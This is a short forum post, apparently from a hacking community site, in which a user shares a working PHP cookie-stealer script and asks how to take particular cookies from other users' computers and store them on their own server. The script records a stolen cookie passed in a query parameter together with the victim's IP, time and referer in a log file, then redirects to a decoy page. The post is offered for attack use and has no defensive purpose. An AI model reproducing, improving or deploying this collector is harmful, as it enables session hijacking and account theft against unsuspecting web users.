Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
cookie stealer in php?
This is the code i have now:(
<?php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("j F, Y, g:i a");; $referer=getenv ('HTTP_REFERER'); $fp = fopen('cookies.txt', 'a'); fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>'); fclose($fp); header ("Location: /pic1542.html"); ?>
But what i want is a code to take cookies from a users computer and save them to my server, i want a sertain cookies, is this possible?
any help would be great thx:D
ahh dint know i had to disable smileys lol:D do now:D